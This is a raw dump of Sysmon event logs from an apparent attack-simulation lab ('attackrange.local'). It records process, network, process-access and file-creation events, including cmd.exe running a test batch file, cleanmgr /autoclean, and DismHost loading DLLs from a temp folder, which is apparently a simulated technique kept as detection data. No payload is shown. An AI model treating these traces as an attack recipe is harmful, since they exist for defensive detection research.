51781 154100x80000000000000001050553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.113{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" 
"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x8000000000000000808412Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:57.668{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F85CABCAAF543E34A538337C738CA17,SHA256=882549E8A4E1C7D60625BE8A5E0DF7CC817A0B643F5055BE7CAC22EAE534345C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808411Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:57.668{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9ED9D1EA375613016F03546325F5421F,SHA256=5B1985B56313FC00FA06AD408A51380870F7D2006C85F4B10973F21D6190BB95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808410Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:57.637{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E1F13B492FF30E1F8C76A1E44BC0E3F,SHA256=8A32F02E4F4D976FEA2DA6031F3FC409EC2B3AC6DA94DA02B7876631B57B11A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:49.338{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse93.86.161.15593-86-161-155.static.isp.telekom.rs63948-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001050611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:49.039{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51091-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001050610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:49.039{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51091-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x80000000000000001050609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:57.147{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D38638E61D9D7C927EE0935A327E0932,SHA256=4CDBEE2DEE84036FD2BF8C174E450D1B93E7621E1437DB9BC318E3A3050A8769,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:57.100{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808415Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:58.637{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37CE7AB474BBD39113F55CA1AEFC3049,SHA256=963A94923168D0E72A41100412C2203B90B81D92B5A6058D995E6E0B2A1A076B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.883{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CA-60EB-6E7D-00000000CF01}9644C:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\dismhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.867{466BC892-0664-60E8-6503-00000000CF01}40245356C:\Windows\system32\csrss.exe{466BC892-F5CA-60EB-6E7D-00000000CF01}9644C:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\dismhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 
10341000x80000000000000001050796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.867{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.867{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000808414Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:56.497{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-22553-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x8000000000000000808413Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:56.363{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57325-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001050794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.867{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:58.867{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.866{466BC892-F5CA-60EB-6B7D-00000000CF01}107610036C:\Windows\system32\cleanmgr.exe{466BC892-F5CA-60EB-6E7D-00000000CF01}9644C:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\dismhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\system32\Dism\DismCore.dll+273f6|C:\Windows\system32\Dism\DismCore.dll+8eaa|C:\Windows\system32\Dism\DismCore.dll+58d4|C:\Windows\system32\DismApi.DLL+55381|C:\Windows\system32\DismApi.DLL+2c46a|C:\Windows\system32\DismApi.DLL+25f06|C:\Windows\system32\DismApi.DLL+24ceb|C:\Windows\system32\DismApi.DLL+2466f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.864{466BC892-F5CA-60EB-6E7D-00000000CF01}9644C:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismHost.exe10.0.14393.4169 (rs1_release.210107-1130)Dism Host Servicing ProcessMicrosoft® 
Windows® Operating SystemMicrosoft CorporationDismHost.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\dismhost.exe {4E7B5E36-370C-474C-B190-523006628FB1}C:\Windows\system32\ATTACKRANGE\Administrator{466BC892-0667-60E8-D79D-240000000000}0x249dd72HighMD5=A59C22B77871CC18970038B7FA43826F,SHA256=CB84B51713BAD689ABB96560E57A71B276D4B28B1C09C7116EE85F5782A1B144,IMPHASH=734010D3430DBD2CA51B599924FE1424{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\System32\cleanmgr.exeC:\Windows\system32\cleanmgr.exe /autoclean /d C: 11241100x80000000000000001050790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-winsvc-l1-1-0.dll2021-07-12 07:56:58.830 11241100x80000000000000001050789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-private-l1-1-1.dll2021-07-12 07:56:58.830 11241100x80000000000000001050788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-private-l1-1-0.dll2021-07-12 07:56:58.830 11241100x80000000000000001050787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-management-l2-1-0.dll2021-07-12 07:56:58.830 11241100x80000000000000001050786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 
07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-management-l1-1-0.dll2021-07-12 07:56:58.830 11241100x80000000000000001050785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-core-l1-1-1.dll2021-07-12 07:56:58.830 11241100x80000000000000001050784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.830{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-core-l1-1-0.dll2021-07-12 07:56:58.830 11241100x80000000000000001050783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-sddl-l1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-security-provider-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-security-lsapolicy-l1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 
07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Security-Lsalookup-L2-1-1.dll2021-07-12 07:56:58.815 11241100x80000000000000001050779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Security-Lsalookup-L2-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-cryptoapi-l1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-base-l1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-EventLog-Legacy-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Provider-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 
07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Legacy-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Controller-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-eventing-consumer-l1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-ClassicProvider-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-devices-config-L1-1-1.dll2021-07-12 07:56:58.815 11241100x80000000000000001050769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-devices-config-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 
07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-xstate-l2-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-xstate-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-wow64-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-version-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-util-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-url-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 
07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-timezone-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-private-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-legacy-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-l1-2-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-2-1.dll2021-07-12 07:56:58.799 11241100x80000000000000001050757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-2-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 
07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-synch-l1-2-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 